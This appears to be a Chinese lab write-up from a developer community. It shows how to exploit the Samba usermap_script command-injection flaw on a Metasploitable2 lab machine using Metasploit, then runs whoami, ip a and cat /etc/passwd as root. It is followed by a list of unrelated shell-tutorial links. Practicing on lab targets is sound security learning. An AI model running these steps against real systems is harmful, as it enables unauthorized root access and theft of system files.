备案控制台
开发者社区 开发与运维 文章 正文

Samba MS-RPC Shell命令注入漏洞

2022-12-13 185
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 靶场环境:metasploitable2靶机地址:192.168.0.109攻击机地址:192.168.0.114首先打开kali,启动msf框架

靶场环境:metasploitable2

靶机地址:192.168.0.109

攻击机地址:192.168.0.114

首先打开kali,启动msf框架

sudo msfdb run

image.png搜索漏洞模块

image.png

选择要利用的模块:

use exploit/multi/samba/usermap_script

image.png

查看所需要设置的参数

show options

我们看到只需要设置RHOSTS(靶机地址)

set rhosts 192.168.0.109

image.png

开始攻击

exploit

image.png

攻击成功

试着执行一下ls命令

image.png

执行成功

whoami查看当前权限为root

image.png

查看靶机ip 

ip a

image.png

查看敏感文件

cat /etc/passwd

image.png

ctrl+c退出

文章标签:
Shell
安全
关键词:
Shell命令
RPC注入
RPC漏洞
Shell漏洞
Shell命令注入漏洞
郝奕程
目录
相关文章
神秘泣男子
|
5天前
|
Shell 程序员 数据安全/隐私保护
shell 脚本 if-else判断 和流程控制 (基本语法|基础命令)
shell 脚本 if-else判断 和流程控制 (基本语法|基础命令)
神秘泣男子
11 1
李振良_阿良
|
17天前
|
网络协议 Unix Shell
第十一章 Shell常用命令与工具(二)
第十一章 Shell常用命令与工具(二)
李振良_阿良
8 0
李振良_阿良
|
17天前
|
移动开发 Shell Linux
第十一章 Shell常用命令与工具(一)
第十一章 Shell常用命令与工具(一)
李振良_阿良
17 0
yuanzhengme
|
22天前
|
存储 Shell 数据安全/隐私保护
ZooKeeper【基础知识 04】控制权限ACL(原生的 Shell 命令)
【4月更文挑战第11天】ZooKeeper【基础知识 04】控制权限ACL(原生的 Shell 命令)
yuanzhengme
27 7
yuanzhengme
|
23天前
|
Shell
ZooKeeper【基础 02】zookeeper-3.6.0 常用Shell命令(节点增删改查+监听器+四字指令)
【4月更文挑战第10天】ZooKeeper【基础 02】zookeeper-3.6.0 常用Shell命令(节点增删改查+监听器+四字指令)
yuanzhengme
25 0
yuanzhengme
|
29天前
|
分布式计算 Hadoop Shell
Hadoop【基础知识 04】【HDFS常用shell命令】(hadoop fs + hadoop dfs + hdfs dfs 使用举例)
【4月更文挑战第4天】Hadoop【基础知识 04】【HDFS常用shell命令】(hadoop fs + hadoop dfs + hdfs dfs 使用举例)
yuanzhengme
33 5
jianz123
|
1月前
|
Shell Linux
在linux shell脚本中root切换到普通用户执行脚本或命令的方法
在linux shell脚本中root切换到普通用户执行脚本或命令的方法
jianz123
13 1
jianz123
|
1月前
|
Shell
shell学习(三)【shell变量、数组,文件命令、特殊变量】
shell学习(三)【shell变量、数组,文件命令、特殊变量】
jianz123
14 0
jianz123
|
1月前
|
Shell
shell 命令(一)概述【别名、 bash重定向 、定义变量】
shell 命令(一)概述【别名、 bash重定向 、定义变量】
jianz123
22 0
BioinfoGuy
|
1月前
|
监控 数据可视化 Unix
自用的Linux命令高效的4个shell替代工具
这篇文章介绍了几个用于提升Unix系统终端体验的替代工具。首先提到了`oh-my-zsh`,然后重点推荐了三个命令行工具:1) `htop`和`btop`作为`top`命令的增强版,提供更丰富的进程监控视图;2) `duf`作为`df`命令的替代,以更整洁的界面显示磁盘空间使用情况;3) `eza`(原`exa`)和`bat`,这两个工具为`ls`和`cat`命令提供了颜色高亮和更好的文件查看体验。这些工具旨在使终端操作更加直观和愉快。
BioinfoGuy
19 0